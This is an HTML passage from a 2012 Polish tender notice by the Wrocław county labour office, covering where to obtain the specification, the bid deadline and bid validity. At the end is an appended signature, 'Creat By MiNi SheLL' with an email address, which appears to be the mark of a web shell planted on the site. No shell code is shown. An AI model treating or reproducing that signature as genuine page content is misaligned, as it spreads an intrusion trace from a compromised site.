3) zmiany w harmonogramie zajęć z przyczyn losowych, pod warunkiem zachowania terminu realizacji umowy, za zgodą Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> pup.wroclaw.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy we Wrocławiu, ul. Gliniana 20-22, 50-525 Wrocław, pok. 112 - I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2012 godzina 10:00, miejsce: Powiatowy Urząd Pracy we Wrocławiu, ul. Gliniana 20-22, 50-525 Wrocław, kancelaria (parter, pokój nr 04).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com